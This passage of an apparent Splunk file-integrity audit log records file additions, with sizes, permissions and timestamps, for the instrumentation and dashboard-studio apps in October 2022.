uid=41812, modtime="Thu Oct 6 17:35:57 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:43:02.413, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_instrumentation/bin/splunk_instrumentation/packager/__pycache__/send_data.cpython-37.opt-1.pyc", isdir=0, size=2697, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:15 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:43:02.407, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_instrumentation/bin/splunk_instrumentation/packager/__pycache__/quick_draw.cpython-37.pyc", isdir=0, size=983, gid=41812, uid=41812, modtime="Thu Oct 6 17:35:57 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:43:02.401, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_instrumentation/bin/splunk_instrumentation/packager/__pycache__/quick_draw.cpython-37.opt-1.pyc", isdir=0, size=983, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:15 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:43:02.395, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_instrumentation/bin/splunk_instrumentation/packager/__pycache__/__init__.cpython-37.pyc", isdir=0, size=9123, gid=41812, uid=41812, modtime="Thu Oct 6 17:35:57 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:43:02.389, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_instrumentation/bin/splunk_instrumentation/packager/__pycache__/__init__.cpython-37.opt-1.pyc", isdir=0, size=9123, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:15 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:43:02.385, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_instrumentation/bin/splunk_instrumentation/packager/send_log.py", isdir=0, size=6057, gid=41812, uid=41812, modtime="Thu Apr 15 17:29:30 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:43:02.381, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_instrumentation/bin/splunk_instrumentation/packager/send_data.py", isdir=0, size=2279, gid=41812, uid=41812, modtime="Thu Apr 15 17:29:30 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:43:02.375, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_instrumentation/bin/splunk_instrumentation/packager/quick_draw.py", isdir=0, size=1225, gid=41812, uid=41812, modtime="Thu Apr 15 17:29:30 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:43:02.370, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_instrumentation/bin/splunk_instrumentation/packager/__pycache__", isdir=1, size=4096, gid=41812, uid=41812, modtime="Thu Oct 6 17:35:57 2022", mode="rwx--x---", hash=] Audit:[timestamp=10-06-2022 17:43:02.363, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_instrumentation/bin/splunk_instrumentation/packager/__init__.py", isdir=0, size=10618, gid=41812, uid=41812, modtime="Thu Apr 15 17:29:30 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:43:02.258, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_instrumentation/bin/splunk_instrumentation/telemetry_run_diag.py", isdir=0, size=3863, gid=41812, uid=41812, modtime="Thu Apr 15 17:29:30 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:43:02.252, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_instrumentation/bin/splunk_instrumentation/telemetry_push_event.py", isdir=0, size=8368, gid=41812, uid=41812, modtime="Thu Apr 15 17:29:30 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:43:02.244, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_instrumentation/bin/splunk_instrumentation/telemetry_list_diags.py", isdir=0, size=2915, gid=41812, uid=41812, modtime="Thu Apr 15 17:29:30 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:43:02.240, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_instrumentation/bin/splunk_instrumentation/telemetry_get_nodes_list.py", isdir=0, size=2720, gid=41812, uid=41812, modtime="Thu Apr 15 17:29:30 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:43:02.234, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_instrumentation/bin/splunk_instrumentation/telemetry_conf_service.py", isdir=0, size=5011, gid=41812, uid=41812, modtime="Thu Apr 15 17:29:30 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:43:02.230, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_instrumentation/bin/splunk_instrumentation/swa_injection_tool.py", isdir=0, size=6881, gid=41812, uid=41812, modtime="Thu Apr 15 17:29:30 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:43:02.222, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_instrumentation/bin/splunk_instrumentation/splunklib", isdir=1, size=4096, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:15 2022", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:43:02.216, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_instrumentation/bin/splunk_instrumentation/splunkd", isdir=1, size=4096, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:15 2022", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:43:02.212, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_instrumentation/bin/splunk_instrumentation/service_bundle.py", isdir=0, size=1400, gid=41812, uid=41812, modtime="Thu Apr 15 17:29:30 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:43:02.206, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_instrumentation/bin/splunk_instrumentation/server_info_service.py", isdir=0, size=1192, gid=41812, uid=41812, modtime="Thu Apr 15 17:29:30 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:43:02.200, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_instrumentation/bin/splunk_instrumentation/schema.json", isdir=0, size=17093, gid=41812, uid=41812, modtime="Thu Apr 15 17:29:30 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:43:02.196, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_instrumentation/bin/splunk_instrumentation/schedule_manager.py", isdir=0, size=3115, gid=41812, uid=41812, modtime="Thu Apr 15 17:29:30 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:43:02.191, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_instrumentation/bin/splunk_instrumentation/salt_manager.py", isdir=0, size=4358, gid=41812, uid=41812, modtime="Thu Apr 15 17:29:30 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:43:02.184, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_instrumentation/bin/splunk_instrumentation/report.py", isdir=0, size=3671, gid=41812, uid=41812, modtime="Thu Apr 15 17:29:30 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:43:02.180, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_instrumentation/bin/splunk_instrumentation/packager", isdir=1, size=4096, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:15 2022", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:43:02.175, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_instrumentation/bin/splunk_instrumentation/metrics", isdir=1, size=4096, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:15 2022", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:43:02.171, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_instrumentation/bin/splunk_instrumentation/instrumentation_controller.py", isdir=0, size=14795, gid=41812, uid=41812, modtime="Thu Apr 15 17:29:30 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:43:02.165, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_instrumentation/bin/splunk_instrumentation/input.py", isdir=0, size=4535, gid=41812, uid=41812, modtime="Thu Apr 15 17:29:30 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:43:02.157, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_instrumentation/bin/splunk_instrumentation/indexing", isdir=1, size=4096, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:15 2022", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:43:02.152, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_instrumentation/bin/splunk_instrumentation/diag", isdir=1, size=4096, gid=41812, uid=41812, modtime="Thu Apr 15 17:29:30 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:43:02.147, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_instrumentation/bin/splunk_instrumentation/deployment_node_list.py", isdir=0, size=9790, gid=41812, uid=41812, modtime="Thu Apr 15 17:29:30 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:43:02.142, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_instrumentation/bin/splunk_instrumentation/deployment_id_manager.py", isdir=0, size=7523, gid=41812, uid=41812, modtime="Thu Apr 15 17:29:30 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:43:02.133, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_instrumentation/bin/splunk_instrumentation/datetime_util.py", isdir=0, size=3434, gid=41812, uid=41812, modtime="Thu Apr 15 17:29:30 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:43:02.125, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_instrumentation/bin/splunk_instrumentation/dataPoints", isdir=1, size=4096, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:15 2022", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:43:02.118, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_instrumentation/bin/splunk_instrumentation/constants.py", isdir=0, size=3855, gid=41812, uid=41812, modtime="Thu Apr 15 17:29:30 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:43:02.111, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_instrumentation/bin/splunk_instrumentation/client_eligibility.py", isdir=0, size=12173, gid=41812, uid=41812, modtime="Thu Apr 15 17:29:30 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:43:02.104, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_instrumentation/bin/splunk_instrumentation/cli_token.py", isdir=0, size=1024, gid=41812, uid=41812, modtime="Thu Apr 15 17:29:30 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:43:02.098, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_instrumentation/bin/splunk_instrumentation/__pycache__", isdir=1, size=4096, gid=41812, uid=41812, modtime="Thu Oct 6 17:35:57 2022", mode="rwx--x---", hash=] Audit:[timestamp=10-06-2022 17:43:02.093, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_instrumentation/bin/splunk_instrumentation/__init__.py", isdir=0, size=0, gid=41812, uid=41812, modtime="Thu Apr 15 17:29:30 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:43:01.883, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_instrumentation/bin/splunk_instrumentation", isdir=1, size=4096, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:15 2022", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:43:01.877, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_instrumentation/bin/set_deployment_id.py", isdir=0, size=946, gid=41812, uid=41812, modtime="Thu Apr 15 17:29:30 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:43:01.870, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_instrumentation/bin/schedule_delete.py", isdir=0, size=841, gid=41812, uid=41812, modtime="Thu Apr 15 17:29:30 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:43:01.863, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_instrumentation/bin/output_telemetry.py", isdir=0, size=7094, gid=41812, uid=41812, modtime="Thu Apr 15 17:29:30 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:43:01.858, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_instrumentation/bin/on_splunk_start.py", isdir=0, size=7405, gid=41812, uid=41812, modtime="Thu Apr 15 17:29:30 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:43:01.852, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_instrumentation/bin/makejson.py", isdir=0, size=5761, gid=41812, uid=41812, modtime="Thu Apr 15 17:29:30 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:43:01.846, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_instrumentation/bin/instrumentation.py", isdir=0, size=7391, gid=41812, uid=41812, modtime="Thu Apr 15 17:29:30 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:43:01.825, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_instrumentation/bin/README.md", isdir=0, size=532, gid=41812, uid=41812, modtime="Thu Apr 15 17:29:30 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:43:01.718, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_instrumentation/local/telemetry.conf", isdir=0, size=187, gid=41812, uid=41812, modtime="Thu Oct 6 17:35:58 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:43:01.712, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_instrumentation/locale/zh_CN/LC_MESSAGES/messages.po", isdir=0, size=37876, gid=41812, uid=41812, modtime="Thu Apr 15 17:29:30 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:43:01.705, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_instrumentation/locale/zh_CN/LC_MESSAGES/messages.mo", isdir=0, size=21639, gid=41812, uid=41812, modtime="Thu Apr 15 17:29:30 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:43:01.697, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_instrumentation/locale/zh_CN/LC_MESSAGES", isdir=1, size=4096, gid=41812, uid=41812, modtime="Thu Apr 15 17:29:30 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:43:01.688, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_instrumentation/locale/ja_JP/LC_MESSAGES/messages.po", isdir=0, size=41165, gid=41812, uid=41812, modtime="Thu Apr 15 17:29:30 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:43:01.683, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_instrumentation/locale/ja_JP/LC_MESSAGES/messages.mo", isdir=0, size=25008, gid=41812, uid=41812, modtime="Thu Apr 15 17:29:30 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:43:01.576, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_instrumentation/locale/ja_JP/LC_MESSAGES", isdir=1, size=4096, gid=41812, uid=41812, modtime="Thu Apr 15 17:29:30 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:43:01.569, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_instrumentation/locale/fr_FR/LC_MESSAGES/messages.po", isdir=0, size=40183, gid=41812, uid=41812, modtime="Thu Apr 15 17:29:30 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:43:01.563, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_instrumentation/locale/fr_FR/LC_MESSAGES/messages.mo", isdir=0, size=24113, gid=41812, uid=41812, modtime="Thu Apr 15 17:29:30 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:43:01.557, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_instrumentation/locale/fr_FR/LC_MESSAGES", isdir=1, size=4096, gid=41812, uid=41812, modtime="Thu Apr 15 17:29:30 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:43:01.553, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_instrumentation/locale/ko_KR/LC_MESSAGES/messages.po", isdir=0, size=38873, gid=41812, uid=41812, modtime="Thu Apr 15 17:29:30 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:43:01.548, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_instrumentation/locale/ko_KR/LC_MESSAGES/messages.mo", isdir=0, size=22669, gid=41812, uid=41812, modtime="Thu Apr 15 17:29:30 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:43:01.543, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_instrumentation/locale/ko_KR/LC_MESSAGES", isdir=1, size=4096, gid=41812, uid=41812, modtime="Thu Apr 15 17:29:30 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:43:01.537, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_instrumentation/locale/de_DE/LC_MESSAGES/messages.po", isdir=0, size=3476500, gid=41812, uid=41812, modtime="Thu Apr 15 17:29:30 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:43:01.532, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_instrumentation/locale/de_DE/LC_MESSAGES/messages.mo", isdir=0, size=1625232, gid=41812, uid=41812, modtime="Thu Apr 15 17:29:30 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:43:01.527, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_instrumentation/locale/de_DE/LC_MESSAGES", isdir=1, size=4096, gid=41812, uid=41812, modtime="Thu Apr 15 17:29:30 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:43:01.419, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_instrumentation/locale/zh_TW/LC_MESSAGES/messages.po", isdir=0, size=37668, gid=41812, uid=41812, modtime="Thu Apr 15 17:29:30 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:43:01.413, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_instrumentation/locale/zh_TW/LC_MESSAGES/messages.mo", isdir=0, size=21438, gid=41812, uid=41812, modtime="Thu Apr 15 17:29:30 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:43:01.410, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_instrumentation/locale/zh_TW/LC_MESSAGES", isdir=1, size=4096, gid=41812, uid=41812, modtime="Thu Apr 15 17:29:30 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:43:01.406, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_instrumentation/locale/it_IT/LC_MESSAGES/messages.po", isdir=0, size=39169, gid=41812, uid=41812, modtime="Thu Apr 15 17:29:30 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:43:01.402, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_instrumentation/locale/it_IT/LC_MESSAGES/messages.mo", isdir=0, size=23078, gid=41812, uid=41812, modtime="Thu Apr 15 17:29:30 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:43:01.398, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_instrumentation/locale/it_IT/LC_MESSAGES", isdir=1, size=4096, gid=41812, uid=41812, modtime="Thu Apr 15 17:29:30 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:43:01.395, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_instrumentation/locale/zh_TW", isdir=1, size=4096, gid=41812, uid=41812, modtime="Thu Apr 15 17:29:30 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:43:01.391, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_instrumentation/locale/zh_CN", isdir=1, size=4096, gid=41812, uid=41812, modtime="Thu Apr 15 17:29:30 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:43:01.387, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_instrumentation/locale/messages.pot", isdir=0, size=29112, gid=41812, uid=41812, modtime="Thu Apr 15 17:29:30 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:43:01.383, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_instrumentation/locale/ko_KR", isdir=1, size=4096, gid=41812, uid=41812, modtime="Thu Apr 15 17:29:30 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:43:01.380, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_instrumentation/locale/ja_JP", isdir=1, size=4096, gid=41812, uid=41812, modtime="Thu Apr 15 17:29:30 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:43:01.376, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_instrumentation/locale/it_IT", isdir=1, size=4096, gid=41812, uid=41812, modtime="Thu Apr 15 17:29:30 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:43:01.373, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_instrumentation/locale/fr_FR", isdir=1, size=4096, gid=41812, uid=41812, modtime="Thu Apr 15 17:29:30 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:43:01.369, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_instrumentation/locale/de_DE", isdir=1, size=4096, gid=41812, uid=41812, modtime="Thu Apr 15 17:29:30 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:43:01.265, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_instrumentation/metadata", isdir=1, size=4096, gid=41812, uid=41812, modtime="Thu Oct 6 17:35:58 2022", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:43:01.259, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_instrumentation/locale", isdir=1, size=4096, gid=41812, uid=41812, modtime="Thu Apr 15 17:29:30 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:43:01.251, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_instrumentation/local", isdir=1, size=4096, gid=41812, uid=41812, modtime="Thu Oct 6 17:35:58 2022", mode="rwx------", hash=] Audit:[timestamp=10-06-2022 17:43:01.245, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_instrumentation/default", isdir=1, size=4096, gid=41812, uid=41812, modtime="Thu Apr 15 17:29:30 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:43:01.240, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_instrumentation/bin", isdir=1, size=4096, gid=41812, uid=41812, modtime="Thu Apr 15 17:29:30 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:43:01.236, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_instrumentation/appserver", isdir=1, size=4096, gid=41812, uid=41812, modtime="Thu Apr 15 17:29:30 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:43:01.232, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_instrumentation/README", isdir=1, size=4096, gid=41812, uid=41812, modtime="Thu Apr 15 17:29:30 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:43:01.226, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk-dashboard-studio/appserver/templates/example-hub.html", isdir=0, size=1150, gid=41812, uid=41812, modtime="Wed Mar 31 20:43:24 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:43:01.222, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk-dashboard-studio/appserver/templates/dashboard.html", isdir=0, size=1853, gid=41812, uid=41812, modtime="Wed Mar 31 20:43:24 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:43:01.116, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk-dashboard-studio/appserver/static/images/examples-hub/healthcare_dashboard/thirdLineGroup.png", isdir=0, size=5239, gid=41812, uid=41812, modtime="Wed Mar 31 20:43:24 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:43:01.110, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk-dashboard-studio/appserver/static/images/examples-hub/healthcare_dashboard/secondLineGroup.png", isdir=0, size=5478, gid=41812, uid=41812, modtime="Wed Mar 31 20:43:24 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:43:01.104, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk-dashboard-studio/appserver/static/images/examples-hub/healthcare_dashboard/legend.png", isdir=0, size=2324, gid=41812, uid=41812, modtime="Wed Mar 31 20:43:24 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:43:01.100, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk-dashboard-studio/appserver/static/images/examples-hub/healthcare_dashboard/fourthLineGroup.png", isdir=0, size=4585, gid=41812, uid=41812, modtime="Wed Mar 31 20:43:24 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:43:01.086, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk-dashboard-studio/appserver/static/images/examples-hub/healthcare_dashboard/firstLineGroup.png", isdir=0, size=9302, gid=41812, uid=41812, modtime="Wed Mar 31 20:43:24 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:43:01.080, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk-dashboard-studio/appserver/static/images/examples-hub/healthcare_dashboard/blueArrow.png", isdir=0, size=84798, gid=41812, uid=41812, modtime="Wed Mar 31 20:43:24 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:43:01.074, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk-dashboard-studio/appserver/static/images/examples-hub/healthcare_dashboard/Background.png", isdir=0, size=2844077, gid=41812, uid=41812, modtime="Wed Mar 31 20:43:24 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:43:01.069, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk-dashboard-studio/appserver/static/images/examples-hub/inputs/time.png", isdir=0, size=5477, gid=41812, uid=41812, modtime="Wed Mar 31 20:43:24 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:43:01.065, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk-dashboard-studio/appserver/static/images/examples-hub/inputs/text.png", isdir=0, size=3045, gid=41812, uid=41812, modtime="Wed Mar 31 20:43:24 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:43:01.060, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk-dashboard-studio/appserver/static/images/examples-hub/inputs/multi.png", isdir=0, size=1338, gid=41812, uid=41812, modtime="Wed Mar 31 20:43:24 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:43:01.056, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk-dashboard-studio/appserver/static/images/examples-hub/inputs/dropdown.png", isdir=0, size=2283, gid=41812, uid=41812, modtime="Wed Mar 31 20:43:24 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:43:01.049, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk-dashboard-studio/appserver/static/images/examples-hub/inputs/cascade.png", isdir=0, size=6530, gid=41812, uid=41812, modtime="Wed Mar 31 20:43:24 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:43:00.943, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk-dashboard-studio/appserver/static/images/examples-hub/complete_examples/workplace-health.png", isdir=0, size=1216497, gid=41812, uid=41812, modtime="Wed Mar 31 20:43:24 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:43:00.939, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk-dashboard-studio/appserver/static/images/examples-hub/complete_examples/workplace-health.jpeg", isdir=0, size=858747, gid=41812, uid=41812, modtime="Wed Mar 31 20:43:24 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:43:00.932, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk-dashboard-studio/appserver/static/images/examples-hub/complete_examples/workplace-detail.jpeg", isdir=0, size=129111, gid=41812, uid=41812, modtime="Wed Mar 31 20:43:24 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:43:00.927, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk-dashboard-studio/appserver/static/images/examples-hub/complete_examples/telecom.jpeg", isdir=0, size=892478, gid=41812, uid=41812, modtime="Wed Mar 31 20:43:24 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:43:00.922, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk-dashboard-studio/appserver/static/images/examples-hub/complete_examples/mdg.png", isdir=0, size=2725876, gid=41812, uid=41812, modtime="Wed Mar 31 20:43:24 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:43:00.916, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk-dashboard-studio/appserver/static/images/examples-hub/complete_examples/health.jpeg", isdir=0, size=709517, gid=41812, uid=41812, modtime="Wed Mar 31 20:43:24 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:43:00.910, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk-dashboard-studio/appserver/static/images/examples-hub/complete_examples/ecom-monitor.jpeg", isdir=0, size=764406, gid=41812, uid=41812, modtime="Wed Mar 31 20:43:24 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:43:00.905, user=n/a, 